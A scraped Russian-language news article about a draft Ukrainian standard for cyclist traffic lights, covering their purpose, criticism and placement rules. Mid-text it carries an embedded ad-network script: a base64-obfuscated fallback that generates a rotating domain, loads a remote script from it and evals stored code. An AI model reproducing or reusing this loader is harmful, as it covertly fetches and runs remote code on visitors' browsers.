В Украине намерены создать новые светофоры для велосипедистов.
Известно, что сейчас занимаются обновлением Госстандарта.
На своей Facebook-странице урбанист Вадим Денисенко объяснил, зачем велосипедистам отдельные светофоры. Инженеры программируют светофоры так, чтобы те загорались зеленым цветом на несколько секунд раньше автомобильных. Благодаря этому велосипедисты будут успевать доехать до середины перекрестка, в то время как машины только начнут движение.
В то же время киевлянин Вадим Сичкарук замечает, что обновленный стандарт не предусматривает велосветлофоры, которые дублируют сигналы пешеходного светофора. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Проблема заключается в том, что когда велосипедная дорожка проходит рядом с пешеходным переходом, который регулируется светофором, у велосипедиста не будет никакого права двигаться на велосипеде (ведь сигнал только для пешеходов), поэтому придется спешить, — объяснил он.
Где их установят?
Согласно первой редакции проекта государственного стандарта Украны 4092:202X «Безопасность дорожного движения. Светофоры дорожные. Общие технические требования. Правила применения», светофоры для велосипедистов предлагают устанавливать в местах пересечения велосипедной дорожки с проезжей частью или регулированным пешеходным переходом. При этом, интенсивность движения на таком участке в течение 8 часов рабочего дня должна быть не менее 50 велосипедистов в час — в таком случае предлагается вводить светофорное регулирование.
Что касается требований к установке велосветофоров, то их предлагают обустраивать справа от велосипедной дорожки, на расстоянии от 0,5 до 2 м от ее края. При этом, сигнал светофора для велосипедистов должен быть видимым и распознаваемым на расстоянии не менее 50 м. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-ukraine-poyavyatsya-novye-svetofory-chto-izvestno/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook